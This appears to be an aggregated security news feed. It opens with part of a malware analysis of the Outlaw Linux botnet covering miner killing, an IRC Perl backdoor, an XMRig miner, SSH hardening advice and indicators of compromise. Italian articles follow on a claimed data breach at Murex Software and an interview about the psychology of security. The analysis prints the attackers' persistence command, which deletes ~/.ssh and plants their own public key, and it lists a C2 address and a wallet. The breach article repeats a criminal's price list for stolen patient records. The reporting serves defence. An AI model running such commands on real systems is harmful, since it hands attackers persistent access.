Interestingly enough, one of the first execution steps is checking if other known miners are present on the machine using the script a/init0. If any miners are found, the script tries to kill and block their execution. One reason for this is to avoid possible overuse of the RAM and CPU on the target machine.

Routine for killing and blocking known miners

The script also monitors running processes, identifies any that use 40% or more CPU by executing the command ps axf-o"pid %cpu", and for each such process, checks its command line (/proc/$procid/cmdline) for keywords like "kswapd0","tsm","rsync","tor","httpd","blitz", or "mass" using the grep command. If none of these keywords are found ( grep doesn’t return zero), the process is forcefully killed with the kill-9 command; otherwise, the script prints "don't kill", effectively whitelisting Outlaw’s known or expected high-CPU processes, so it doesn’t accidentally kill them.

Processes checks performed by the threat

After the process checks and killing are done, the b/run file is executed, which is responsible for maintaining persistence on the infected machine and executing next-stage malware from its code. For persistence purposes, the attackers used the following command to wipe the existing SSH setup, create a clean .ssh folder, add a new public key for SSH access, and lock down permissions.
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh
The next-stage malware is a Base64-encoded string inside the b/run script that, once decoded, reveals another level of obfuscation: this time an obfuscated Perl script. Interestingly, the attackers left a comment generated by the obfuscator (perlobfuscator.com) in place.

Obfuscated Perl script

We were able to easily deobfuscate the code using an open-source script available on the same website as used by the attackers (perlobfuscator.com/decode-stun…), which led us to the original source code containing a few words in Portuguese.

Deobfuscated Perl script

This Perl script is an IRC-based botnet client that acts as a backdoor on a compromised system. Upon execution, it disguises itself as an rsync process, creates a copy of itself in the background, and ignores termination signals. By default, it connects to a hardcoded IRC server over port 443 using randomly generated nicknames, joining predefined channels to await commands from designated administrators. The bot supports a range of malicious features including command execution, DDoS attacks, port scans, file download, and upload via HTTP. This provides the attackers with a wide range of capabilities to command and control the botnet.

XMRig miner

Another file from the hidden directory, a/kswapd0, is an ELF packed using UPX, as shown in the image below. We were able to easily unpack the binary for analysis.

kswapd0 identification and unpacking

By querying the hash on threat intelligence portals and by statically analyzing the sample, it became clear that this binary is a malicious modified version of XMRig (6.19.0), a cryptocurrency miner.

XMRig version

We also found a configuration file embedded in the binary. This file contains the attacker’s mining information. In our scenario, the configuration was set up to mine Monero using the CPU only, with both OpenCL and CUDA (for GPU mining) disabled. The miner runs in the background, configured for high CPU usage. It also connects to multiple mining pools, including one accessible via Tor, which explains the presence of Tor files inside the .configrc5/a directory. The image below shows an excerpt from this configuration file.

XMRig custom configuration

Victims

Through telemetry data collected from public feeds, we have identified victims of the Outlaw gang mainly in the United States, but also in Germany, Italy, Thailand, Singapore, Taiwan, Canada and Brazil, as shown in the chart below.

Countries and territories where Outlaw is most active< (download)

The following chart shows the distribution of recent victims. We can see that the group was idle from December 2024 through February 2025, then a spike in the number of victims was observed in March 2025.

Number of Outlaw victims by month, September 2024–March 2025 (download)

Recommendations

Since Outlaw exploits weak or default SSH passwords, we recommend that system administrators adopt a proactive approach to hardening their servers. This can be achieved through custom server configurations and by keeping services up to date. Even simple practices, such as using key-based authentication, can be highly effective. However, the /etc/ssh/sshd_config file allows for the use of several additional parameters to improve security. Some general configurations include:

• Port <custom_port_number>: changes the default SSH port to reduce exposure to automated scans.
• Protocol 2: enforces the use of the more secure protocol version.
• PermitRootLogin no: disables direct login as the root user.
• MaxAuthTries <integer>: limits the number of authentication attempts per session.
• LoginGraceTime <time>: defines the amount of time allowed to complete the login process (in seconds unless specified otherwise).
• PasswordAuthentication no: disables password-based login.
• PermitEmptyPasswords no: prevents login with empty passwords.
• X11Forwarding no: disables X11 forwarding (used for running graphical applications remotely).
• PermitUserEnvironment no: prevents users from passing environment variables.
• Banner /etc/ssh/custom_banner: customizes the system login banner.

Consider disabling unused authentication protocols:

• ChallengeResponseAuthentication no
• KerberosAuthentication no
• GSSAPIAuthentication no

Disable tunneling options to prevent misuse of the SSH tunnel feature:

• AllowAgentForwarding no
• AllowTcpForwarding no
• PermitTunnel no

You can limit SSH access to specific IPs or networks using the AllowUsers directive:

• AllowUsers *@10.10.10.217
• AllowUsers *@192.168.0.0/24

Enable public key authentication with:

• PubkeyAuthentication yes

Set parameters to automatically disconnect idle sessions:

• ClientAliveInterval <time>
• ClientAliveCountMax <integer>

The following configuration file serves as a template for hardening the SSH service:
Protocol 2
Port 2222

LoginGraceTime 10
PermitRootLogin no
MaxAuthTries 3
IgnoreRhosts yes
PubkeyAuthentication yes
PasswordAuthentication no
PermitEmptyPasswords no

UsePAM yes
ChallengeResponseAuthentication no
KerberosAuthentication no
GSSAPIAuthentication no

AllowAgentForwarding no
AllowTcpForwarding no
X11Forwarding no
PrintMotd no
PrintLastLog yes
PermitUserEnvironment no
ClientAliveInterval 300
ClientAliveCountMax 2
PermitTunnel no

Banner /etc/ssh/custom_banner
AllowUsers *@10.10.10.217
While outside sshd_config, pairing your config with tools like Fail2Ban or firewalld rate limiting adds another solid layer of protection against brute force.

Conclusion

By focusing on weak or default SSH credentials, Outlaw keeps improving and broadening its Linux-focused toolkit. The group uses a range of evasion strategies, such as concealing files and folders or obfuscated programs, and uses compromised SSH keys to keep access for as long as possible. The IRC-based botnet client facilitates a wide range of harmful operations, such as command execution, flooding, and scanning, while the deployment of customized XMRig miners can divert processing resources to cryptocurrency mining. By hardening SSH configurations (for instance, turning off password authentication), keeping an eye out for questionable processes, and limiting SSH access to trustworthy users and networks, system administrators can greatly lessen this hazard.

Tactics, techniques and procedures

Below are the Outlaw TTPs identified from our malware analysis.

Indicators of Compromise

• 15f7c9af535f4390b14ba03ddb990c732212dde8 (a)
• 982c0318414c3fdf82e3726c4ef4e9021751bbd9 (init0)
• f2b4bc2244ea8596a2a2a041308aa75088b6bbd5 (kswapd0)
• 4d5838c760238b77d792c99e64bd962e73e28435 (run)
• d0ba24f9fad04720dff79f146769d0d8120bf2ff (decoded Perl script)
• 45[.]9[.]148[.]99 (Attacker’s C2)
• 483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS (Monero wallet)

securelist.com/outlaw-botnet/1…

Un threat actor rivendica l’accesso non autorizzato ai sistemi di Murex Software. In vendita 280.000 profili sanitari italiani completi di dati personali, prescrizioni e certificati medici.

La vicenda ha inizio il 7 marzo, quando un threat actor dallo pseudonimo euet2849, pubblica un primo post sostenendo di aver esfiltrato circa 300.000 profili sanitari di cittadini italiani, specificando che si tratta esclusivamente di soggetti residenti nel Nord Italia (ndr: proseguendo nella lettura, capiremo forse il motivo di questa precisa geolocalizzazione…).
Nel messaggio iniziale non viene fornita alcuna informazione sulla provenienza tecnica dei dati, ma solo un listino prezzi che varia da 1 a 35 euro per singolo dossier con diverse “opzioni” di acquisto.

• Opzione A
  
  • Nome completo, Codice fiscale, Data di nascita, Indirizzo di residenza

  
  

• Opzione B
  
  • Tutti i dati dell’Opzione A con in aggiunta: Indirizzo email, Numero di telefono, Storico prescrizioni mediche dal 2021/2022

  
  

• Opzione C
  
  • Tutti i dati dell’Opzione B con in aggiunta: Prescrizioni mediche recenti in PDF, Certificati medici (permessi di lavoro) in PDF

  
  

Il post viene aggiornato il 12 Aprile da parte dell’autore che lo “arricchisce” con nuove informazioni circa i backend da cui sarebbero stati esfiltrati i dati e gli exploit utilizzati.

La società, sempre secondo il post, sarebbe stata contattata per segnalare le vulnerabilità, ma non avrebbe fornito risposta.

Secondo quanto riportato nel post i backend violati sono due:

• https://pazienteconsapevole.murex.it
• https://medicallive.murex.it

tutti e due presentano gravi vulnerabilità nei controlli delle variabili POST e GET, che hanno permesso l’accesso a dati sensibili sia dei pazienti che dei medici.

Il perchè dei dati sanitari di pazienti del Nord Italia

Analizzando i software indicati, il portale pazienteconsapevole è un software utilizzato in 112 farmacie tra le provincie di Milano, Brescia, Como e Monza Brianza; ecco spiegato il motivo per cui i dati in vendita sono riferibili ai pazienti del Nord Italia, come riportato da euet2849 nel suo post.

Prove tecniche dell’attacco

Nel thread vengono allegati link a materiale dimostrativo che documenterebbe l’accesso non autorizzato ai sistemi di Murex Software e la conseguente esfiltrazione dei dati. Gli screenshot pubblicati mostrano in modo inequivocabile l’accesso sia al portale riservato ai medici curanti, sia a quello dedicato ai pazienti.
Va inoltre sottolineato che i dati risultano recenti e aggiornati, confermando con buona certezza che l’attacco è avvenuto intorno alla metà di marzo 2025.

Considerazioni finali

Il data breach rappresenta un grave episodio di esposizione di dati sanitari in Italia, che coinvolge sia il canale medico che quello paziente. La criticità delle vulnerabilità tecniche — legate alla mancata validazione dei parametri sulle chiamate POST e GET — è una problematica ben nota nel mondo dello sviluppo web, ma ancora oggi troppo spesso trascurata.

La presenza di PDF contenenti prescrizioni e certificati suggerisce un livello di compromissione profondo, e una possibile persistenza prolungata del threat actor all’interno dei sistemi bersaglio.

Nessuna dichiarazione ufficiale

Ad oggi, Murex Software non ha rilasciato alcuna comunicazione ufficiale sull’eventuale compromissione dei propri sistemi, pertanto queste informazioni sono da intendere come “intelligence” sulle minacce.

Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.

RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.

L'articolo Murex Software sotto attacco: esfiltrati dati sanitari da due backend italiani proviene da il blog della sicurezza informatica.

Il Rapporto Clusit 2025 come il Report Dark Mirror Q1-2025 di Dark Lab – il laboratorio di Cyber Threat Intelligence di Red Hot Cyber – che hanno analizzato gli incidenti di sicurezza informatica a livello globale, hanno rivelato che l’Italia rimane uno dei paesi più colpiti dalla criminalità informatica: nel primo trimestre del 2025 l’Italia ha registrato inoltre il numero più alto di vittime ransomware mai osservato. Il report di Dark Lab soprattutto, contributo strategico per rafforzare la consapevolezza e la postura difensiva del nostro Paese, sottolinea l’urgenza di adottare nuovi approcci proattivi nell’ambito della sicurezza informatica, come la promozione di una collaborazione piú stretta tra imprese, istituzioni e settore privato.

Tuttavia “è anche tempo di comprendere che la sicurezza è una partita che non si gioca solo tra firewall e antivirus, ma soprattutto nella nostra mente” sottolinea Fabrizio Saviano, che abbiamo intervistato per addentrarci in una materia come il “Cybercognitivismo” che ci spiega: “La vera, sottile minaccia è che, pur sapendo che il rischio è concreto e in aumento, il nostro cervello ci spinge a sottovalutarlo: quel «tanto a me non succederà» è un bias pericoloso quanto una vulnerabilità zero-day”.

Tuttavia “è anche tempo di comprendere che la sicurezza è una partita che non si gioca solo tra firewall e antivirus, ma soprattutto nella nostra mente” sottolinea Fabrizio Saviano, che abbiamo intervistato per addentrarci in una materia come il “Cybercognitivismo” che ci spiega: “La vera, sottile minaccia è che, pur sapendo che il rischio è concreto e in aumento, il nostro cervello ci spinge a sottovalutarlo: quel «tanto a me non succederà» è un bias pericoloso quanto una vulnerabilità zero-day”.

Fabrizio Saviano, esperto di spicco in questo campo, con una solida carriera che spazia dalla Polizia Postale al ruolo di CISO e una prolifica attività letteraria culminata nel fondamentale “Manuale CISO Security Manager”, ci guida in un’esplorazione affascinante del “Cybercognitivismo”. Questa prospettiva innovativa attraversa la comprensione dei processi mentali per rafforzare la nostra resilienza nel mondo digitale.

Ma l’impegno di Fabrizio Saviano non si ferma al solo ambito professionale. Come presidente dell’Associazione Ri-Creazione incarna un forte spirito sociale, guidato dal motto “Azione, Creazione di nuove opportunità e Ri-Creazione di opportunità per chi le ha perse”. Con un focus sull’inclusione lavorativa di persone fragili a livello cognitivo e sociale, Ri-Creazione porta avanti progetti concreti, supportata da istituzioni, media e dalla convinzione che la diversità sia una risorsa preziosa, specialmente nel complesso mondo della cybersicurezza.

In questa intervista esclusiva con Red Hot Cyber, Fabrizio Saviano ci offre una visione su come rivoluzionare l’approccio alla sicurezza, rendendola più efficace e inclusiva, a partire dalle esigenze dei più vulnerabili, per poi estendersi al beneficio di tutti.

Cybercognitivismo, ‘tutti sanno cosa devono fare, ma molti non lo fanno’: intervista a Fabrizio Saviano

“[..] è anche tempo di comprendere che la sicurezza è una partita che non si gioca solo tra firewall e antivirus, ma soprattutto nella nostra mente” _ Fabrizio Saviano

Fabrizio Saviano è un esperto nel campo della sicurezza informatica, delle tecnologie persuasive e del cognitivismo applicato alla cybersicurezza. La sua recente produzione letteraria include “Cyberpersuasione e Cybercapitalismo. Tecnologie persuasive e capitalismo dell’attenzione”, “Cybercognitivismo. La psicologia della cybersicurezza”, “Manuale OSINT per tutti”. Ma tra tutti spicca il fondamentale “Manuale CISO Security Manager”, che serve sia per la preparazione alla certificazione CISSP, sia per la pratica quotidiana di chi gestisce la sicurezza o vorrebbe farne la propria professione.

La carriera professionale di Fabrizio va dalla Squadra Intrusioni della Polizia Postale al ruolo di CISO, contribuendo all’avvio di BT Security in Italia e alla realizzazione della rete della Regione Molise. Nel contempo è anche Istruttore Autorizzato (ISC)² per la certificazione CISSP e presidente dell’Associazione Ri-Creazione. A scuola, la ricreazione rappresenta il momento di svago: un po’ si impara e un po’ ci si diverte, e da questo spirito nasce il motto “Azione, Creazione di nuove opportunità e Ri-Creazione di opportunità per chi le ha perse”. In concreto, l’attività sociale consiste nel sensibilizzare all’inclusione lavorativa le aziende, le istituzioni, i fragili cognitivi (persone con ADHD, DSA, Sindrome di Down, non udenti, dislessici, etc.) e i fragili sociali (detenuti ed ex detenuti, NEET e ELET, over-50 che hanno perso il lavoro, etc.).

In linea con questa missione, Ri-Creazione ha completato corsi gratuiti di formazione specializzata e alcuni progetti PNRR con le scuole della periferia milanese, offrendo concrete opportunità di reinserimento lavorativo. L’associazione è supportata da alcune associazioni della Polizia di Stato, celebrities, istituzioni e media tra cui Red Hot Cyber, a testimonianza dell’impatto sociale del suo messaggio. In questo contesto, Fabrizio Saviano incarna una figura che unisce l’expertise nel mondo cyber con un profondo impegno sociale, dimostrando come la conoscenza e le competenze possano essere messe al servizio della creazione di opportunità e dell’inclusione per le fasce più vulnerabili della società.

1 – Innanzitutto grazie per esserti reso disponibile a questa intervista a nome di tutto il team di Red Hot Cyber. Passo subito alla prima domanda. Hai affermato che “la sicurezza informatica non è solo tecnologia e firewall ma è capire come funziona la nostra mente nel mondo digitale”: ci puoi spiegare di più a riguardo? E aggiungo: quanto contano i processi cognitivi umani – percezione, apprendimento, ragionamento – per la comprensione dei sistemi digitali?

Esatto, la sicurezza informatica può essere rappresentata con il cosiddetto “Triangolo D’Oro” o “PPT”: Persone, Processi e Tecnologie. Le Persone sono il cuore pulsante del sistema: affideresti all’intelligenza artificiale la vita di un essere umano?

Le persone creano, innovano e, alla fine, orchestrano sia i processi che le tecnologie: per fare questo in modo efficace e nei limiti biologici del cervello, hanno bisogno di strutture organizzative e di strumenti tecnici che li supportino. Ecco dove entrano in gioco i Processi e le Tecnologie. I Processi servono ad assicurare coerenza, armonia e standardizzazione nella risposta agli eventi. Grazie a processi ben definiti, se un membro di un team viene svegliato nel cuore della notte a causa di un’emergenza, seguendo il processo sa esattamente cosa fare. Ma in un’era dominata dai dati, dove miliardi di informazioni vengono generate ogni secondo, come possono le persone gestire il sovraccarico informativo? Siamo nell’era dell’infobulimia e dell’infobesità, e qui entrano in gioco le Tecnologie: sono una specie di estensione del nostro cervello che ci aiuta a digerire, analizzare ed interpretare quantità di dati che altrimenti sarebbero ingestibili.

Al contrario, quando la dimensione tecnologica o quella dei processi prendono il posto della dimensione umana, si rischia di perdere di vista il vero scopo per cui tali dimensioni esistono: fornire valore alle persone, semplificare il loro accesso alle informazioni, fluidificare il loro modo di lavorare e, in ultima istanza, renderle in grado di prendere decisioni informate. E i criminali hanno capito da tempo che conoscere le vulnerabilità delle tecnologie e sapere come sfruttarle è più complicato di convincere una persona a concedere un’autorizzazione, e persino a rivelare una password complessa.

Facciamo un esempio: immagina che questa sera al teatro, un prestigiatore in t-shirt ti chiami sul palcoscenico per aiutarlo ad eseguire il proprio trucco magico. Ti mostra le mani e le braccia nude, svuota le tasche e non sembra nascondere proprio niente… Poi, pronuncia la parola magica, fa apparire dal nulla una monetina dietro il tuo orecchio e tu, insieme a tutto il pubblico, rimanete a bocca aperta. Ma come avrà fatto? E scatta l’applauso! Il trucco c’è ma non si vede: questo mago è un professionista che sa fare bene il proprio lavoro e che ha provato il trucco tantissime volte prima di questa sera. Adesso prova ad immaginare la stessa scena, ma sostituendo il prestigiatore con un truffatore. La conclusione sarà «Ma come ho fatto a farmi fregare così?». Bene, entrambi i professionisti hanno saputo fare il proprio mestiere sfruttando le approssimazioni e le scorciatoie che il nostro cervello usa in continuazione per prendere decisioni ogni millisecondo: in una parola, i “bias”. Anche pensare «Tanto io non ho nulla da rubare, perché dovrebbe accadere proprio a me? Tanto io non ci casco e, se dovesse succedere, comunque farò attenzione, comunque chiederò aiuto all’amico esperto, comunque ci pensa l’Ufficio Informatico, l’antivirus, qualcun altro o qualcos’altro» sono tutti bias che il nostro cervello usa per allontanare da sé l’idea stessa del pericolo, in modo da non doverci pensare e poi magari dover anche agire!

2 – Passiamo un attimo al cognitive computing: i sistemi informatici possono imitare i processi cognitivi umani per risolvere problemi complessi, riconoscere pattern, e supportare alcune decisioni. Cosa significa imparare dall’esperienza e adattarsi? Le deduzioni dell’uomo sono davvero similari alle deduzioni prodotte da un computer?

Questo punto molto è molto interessante, perchè che tocca il cuore del Cybercognitivismo. Sebbene i sistemi di cognitive computing possano imitare i processi cognitivi umani per risolvere problemi complessi, riconoscere pattern e supportare decisioni, le deduzioni dell’uomo non sono del tutto simili a quelle prodotte da un computer. Infatti, il cervello umano ha una capacità limitata rispetto ai computer, ma in ottica evoluzionistica, i bias ci hanno permesso di evitare l’estinzione: a volte queste strategie innate di approssimazione ci fanno cadere vittime di una truffa, altre volte invece la scorciatoia si rivela una buona scelta.

Infatti, differentemente dai computer, di fronte a situazioni pericolose, in cui il tempo per prendere le decisioni è alquanto limitato, è di fondamentale importanza avere un cervello che sia capace di processare i dati velocemente e leggere le situazioni con estrema rapidità. Eventualmente, può anche evitare di prendere decisioni e farci semplicemente scappare di fronte al pericolo.

Non è semplice comparare un cervello ad un microprocessore, ma è un esercizio che può essere utile per rendere l’idea di quanto abbiamo bisogno di usare le approssimazioni. Secondo alcuni studi, la capacità computazionale di un cervello medio potrebbe equivalere ad 1 exaflop al secondo, mentre la capacità di memoria potrebbe aggirarsi attorno ai 2,5 petaByte. Per avere un benchmark di riferimento, il supercomputer più potente al mondo supera la capacità di calcolo di 1 exaflop ed è equipaggiato con oltre 700 petaByte di storage: supera il cervello umano, ma non riesce a sostituirlo. Infatti, il cervello non necessita la precisione del computer, è intuitivo nelle valutazioni ed è rapido nella correlazione di informazioni non strutturate.

Pertanto, conferire alla dimensione tecnologica la pretesa di risolvere i problemi (ad esempio, un antivirus o un’intelligenza artificiale generativa) o dedurre qualcosa al posto nostro è ancora una volta un bias!

3 – I nostri meccanismi mentali ci rendono vulnerabili in ambiente digitale: anche quando sappiamo che possiamo cadere nella truffa i nostri bias e la social engineering usata dai criminali ci spingono comunque sempre a sbagliare. Come la sicurezza informatica può riorganizzarsi tenendo conto dei processi cognitivi umani e in che modo possiamo migliorare la nostra resistenza per prendere decisioni più informate controllando i nostri bias?

È vero. Se guardiamo qualsiasi studio sugli attacchi informatici, il fattore umano è direttamente responsabile di 7 tipologie di attacchi su 10 e indirettamente responsabile delle altre tipologie: possiamo affermare che tutte le attuali tecniche e tecnologie di formazione, per quanto avanzate e innovative, non stanno funzionando. Infatti, i nostri meccanismi mentali ci rendono vulnerabili nell’ambiente digitale e i bias cognitivi possono indurci a commettere errori anche quando siamo consapevoli del rischio. Nel libro “Cybercognitivismo” approfondisco proprio le tecniche di ingegneria sociale, cioè l’uso dell’inganno per manipolare le persone affinché esse divulghino informazioni riservate o personali, in modo consapevole e inconsapevole.

Cybercognitismo. La psicologia della sicurezza, Fabrizio Saviano
La sicurezza informatica deve riorganizzarsi rifocalizzando l’attenzione sulle persone, ovvero su coloro che operativamente programmano le tecnologie, disegnano i processi, creano le leggi e decidono se essere guardie o ladri. Ecco perché è fondamentale un approccio basato sul Cybercognitivismo per controllare i nostri bias, migliorare la nostra resistenza e prendere decisioni più informate. Nell’omonimo libro presento gli studi scientifici a suffragio di questo nuovo paradigma e propongo alcuni esempi:

• Formazione che crei vera consapevolezza: tutti sanno cosa devono fare, ma molti non lo fanno…
• Un approccio di tipo “storytelling” nella formazione, che si è dimostrato più efficace del “fact-telling”. Spoiler: la gamification è sopravvalutata.
• Esperienze pratiche e coinvolgenti, come simulazioni di phishing che attivino un meccanismo di protezione senza causare un trauma reale (il cosiddetto “trauma-non trauma”). Infatti, insegna di più ricevere un ceffone che non una carezza, perché il ceffone scatena in ognuno di noi la paura di riceverne un altro!
• Promuovere la consapevolezza nella valutazione di un messaggio, aiutando a capire le emozioni e le azioni istintive che il messaggio genera.
• Creare programmi di formazione che colleghino la consapevolezza informatica con la vita personale. È più facile che una persona impari a creare password forti per il Wi-Fi di casa (cioè, per la propria rete) che per il Wi-Fi dell’ufficio (cioè, per la rete di qualcun altro): questo collegamento abilita la creazione di buone abitudini di igiene personale di sicurezza!
• Alfabetizzazione digitale per il personale non specializzato, che deve sviluppare caratteristiche difensive come attenzione, prontezza e reattività.
• Incoraggiare un’elaborazione mentale più dettagliata dei problemi, ad esempio chiedendo agli utenti di riagganciare una telefonata inaspettata, eventualmente approfondendo o informandosi. In una parola, una formazione efficace ci insegna ad essere più prudenti e sospettosi.

4 – I nostri bias ci rendono anche manipolabili, nelle nostre decisioni e nei nostri comportamenti, e poco consapevoli delle nostre scelte online. Inoltre ci si preoccupa della sorveglianza dei governi, tuttavia gli schermi stanno diventando i veri padroni delle nostre vite. Tu parli di cyber capitalismo, ovvero il capitalismo dell’attenzione nell’era digitale: come è potuto accadere che la tecnologia, da mezzo di comunicazione e unione stia andando verso la distanza e il distaccamento?

La manipolabilità online di ognuno di noi passa dal ruolo crescente degli schermi nelle nostre vite: la tecnologia può trasformarsi da strumento unificatore a fonte di distanza, e la tecnica di caccia dei predatori consiste proprio nell’isolare la preda dal suo gruppo o dalla sua famiglia, per renderla più vulnerabile. I nostri bias ci rendono manipolabili nelle decisioni e nei comportamenti online, spesso perché abbiamo poca consapevolezza delle nostre scelte: fino ad ora abbiamo parlato di criminali, ma anche tecnologie apparentemente innocue o utili, come i social networks o gli smartwatch, sfruttano i nostri bias per indurci a compiere azioni desiderate da altri. Su questa capacità delle “tecnologie persuasive” di influenzare il nostro comportamento è nata una vera e propria forma di capitalismo: il capitalismo dell’attenzione (la nostra).

La nostra tendenza a perderci in attività online coinvolgenti e senza fine, cioè l’”effetto tana del coniglio“, dimostra la forza attrattiva degli schermi e la tecnologia, da mezzo di comunicazione e unione tra le persone, sta generando distaccamento a causa di diversi fattori:

• Inizialmente promessa come soluzione a molti problemi, la tecnologia è pervasiva sulla dimensione umana, forse perché è più facilmente manipolabile.
• Tendiamo a fossilizzarci sulle nostre preferenze, perché le tecnologie limitano la nostra esposizione a opinioni diverse alle nostre attraverso meccanismi noti come “filter bubbles” e “echo chambers” creati dalle tecnologie online (ad esempio i social network e le pubblicità mirate).
• Le piattaforme adattano il proprio funzionamento in base ai nostri comportamenti, contribuendo a plasmare ulteriormente le nostre dinamiche sociali online, rendendole meno spontanee e spesso progettate accuratamente (il cosiddetto “behaviour design”) per mantenerci connessi agli schermi, in modo da vendere più inserzioni, interazioni e dati comportamentali.

Intere economie digitali (app economy, social network, influencer marketing) sono nate sulla capacità delle tecnologie di influenzarci e monopolizzare la nostra attenzione per venderla agli inserzionisti. Il social network, ad esempio, non è pagato per il risultato della pubblicità, ma per averla mostrata sullo schermo, creando un sistema basato sulla cattura della nostra attenzione. Questa nuova forma di “capitalismo della sorveglianza” si basa su un continuo “esproprio digitale” in cui le aziende ci rendono costantemente “comprensibili” per misurare e sfruttare la nostra libera volontà.

Aziende come le Big Tech e i loro prodotti, insieme agli investimenti di agenzie governative come la statunitense NSA, hanno creato un ambiente favorevole a questa forma di capitalismo.

5 – Un hacker – buono o cattivo – ha una preponderanza del pensiero lento su quello veloce. Cosa ne pensi? Puoi fornirmi le tue osservazioni in materia?

Questa è un’affermazione interessante che merita alcune osservazioni. Cominciamo col dire che i termini “virus” e “hackers” sono un romantico retaggio dei film anni ‘80: ormai gli “smanettoni” si sono evoluti in organizzazioni criminali modernamente strutturate, dotate

di importanti risorse quali fondi di investimento, sponsorship governative e persino consulenti di psicologia che mettono a disposizione la propria expertise per creare truffe più credibili. Queste aziende criminali si sono dotate di reti commerciali, programmi di affiliazione, consulenti esperti in ogni area che erogano servizi avanzati, tra cui persino i call center che guidano i clienti-vittime ad acquistare le criptovalute necessarie per poter pagare il riscatto. Insomma, parliamo di veri e propri providers che forniscono servizi in cloud tramite e-commerce, che rivendono i propri strumenti di attacco anche a quei terzi che, privi delle conoscenze tecniche necessarie a crearne di propri, hanno comunque un proprio elenco di vittime da attaccare.

Fatta questa doverosa premessa, possiamo dire che un hacker, sia esso etico (“buono”) o criminale (“cattivo”), in molte fasi del suo lavoro deve fare affidamento sul pensiero lento. L’analisi di un sistema complesso o della presenza pubblica di una potenziale vittima, la pianificazione di un attacco, lo sviluppo di exploit o la ricerca di vulnerabilità, siano esse tecnologiche o umane, sono tutte fasi che richiedono attenzione ai dettagli, ragionamento logico e una profonda concentrazione.

Queste attività sono tipiche del “pensiero lento”, come descritto da Daniel Kahneman e ripreso dal mio libro “Cybercognitivismo” dal punto di vista dell’hacker. Tuttavia, non credo che si possa parlare di una preponderanza assoluta del pensiero lento: ci sono momenti in cui anche un hacker deve utilizzare il pensiero veloce. Ad esempio, durante la fase di ricognizione iniziale è necessaria la capacità di individuare rapidamente informazioni utili, oppure potrebbe essere necessario adattarsi rapidamente a cambiamenti imprevisti durante l’attacco. Inoltre, la familiarità e l’esperienza giocano un ruolo fondamentale. Un hacker esperto potrebbe aver automatizzato mentalmente alcuni processi che per un principiante richiederebbero un’analisi lenta e dettagliata. In questo senso, il “pensiero veloce” può essere il risultato di anni di “pensiero lento” e apprendimento.

Infine, è importante considerare che le tecniche di ingegneria sociale mirano a sfruttare il “pensiero veloce” della vittima, inducendola a prendere decisioni impulsive senza riflettere attentamente. L’hacker che utilizza queste tecniche deve essere in grado di orchestrare l’attacco in modo da bypassare il “pensiero lento” della vittima e, a tal fine, nel libro “Cybercognitivismo” è stato necessario affrontare anche le tematiche del Cervello Trino, della Programmazione Neuro Linguistica e dello Storytelling usato per truffare, oltre a 50 bias.

6 – A questo punto puoi descrivermi le caratteristiche necessarie di chi lavora nell’ambito della sicurezza informatica?

È giunto il momento di sfatare un mito: non tutti i ruoli legati alla cybersecurity sono tecnici e non è necessario possedere una laurea specialistica, né passare anni davanti al computer per lavorare nell’ambito della sicurezza. Forse proprio a causa di questa convinzione, nel 2022 il Direttore dell’Agenzia di Cybersicurezza Nazionale dichiarò che mancavano 100.000 posti di lavoro. Sicuramente si tratta di ruoli tecnici, ma anche di impiegati amministrativi, ispettori, venditori e tantissime altre figure professionali. Molti di questi ruoli possono essere ricoperti con successo anche da persone con background formativi diversi da quelli strettamente tecnici, purché possiedano le giuste attitudini e siano disposte ad acquisire le competenze specifiche necessarie attraverso corsi, certificazioni ed esperienza sul campo.

Infatti, molti impiegati di un’azienda che produce aerei probabilmente non hanno idea di come sia fatta una cabina di pilotaggio! Ma la passione per una materia e la volontà di apprendere sono i fattori chiave per il successo in qualsiasi settore, specie in un settore così dinamico e in continua crescita come la sicurezza. In generale, tra le caratteristiche necessarie a lavorare nell’ambito della sicurezza, includo:

• Curiosità guidata da un obiettivo.
• Conoscenza dei sistemi operativi, delle reti, delle applicazioni web, nonché dei concetti di base della programmazione e dell’architettura di sicurezza cyber e fisica. Questo significa banalmente avere familiarità almeno con i concetti fondanti. Ecco perché la curiosità è il primo punto di questa lista!
• Capacità di analisi e problem solving, ovvero identificare pattern, ragionare criticamente sui casi pratici che si presentano giornalmente.
• Attenzione ai dettagli, soprattutto in attività di analisi, monitoraggio e individuazione di minacce. Gli hacker sono attenti ai dettagli e devi esserlo anche tu.
• Capacità di concentrazione prolungata. È qui che i profili neurodivergenti danno il meglio di sé e l’inclusione si riempie di significato.
• Mentalità investigativa. Chi lavora nella sicurezza informatica deve essere curioso, ma anche proattivo nel fare domande e non accontentarsi di risposte evasive.
• Capacità di comunicare concetti tecnici a persone non tecniche e viceversa: è un esercizio che può cominciare a casa e in famiglia.
• Aggiornamento continuo guidato dalla curiosità.

Ancora una volta il Cybercognitivismo ci viene incontro: sfruttando i bias a nostro vantaggio, è possibile selezionare la persona giusta per il lavoro giusto, per poi formarla alla cybersicurezza nell’arco di tre mesi anziché nell’arco di anni.

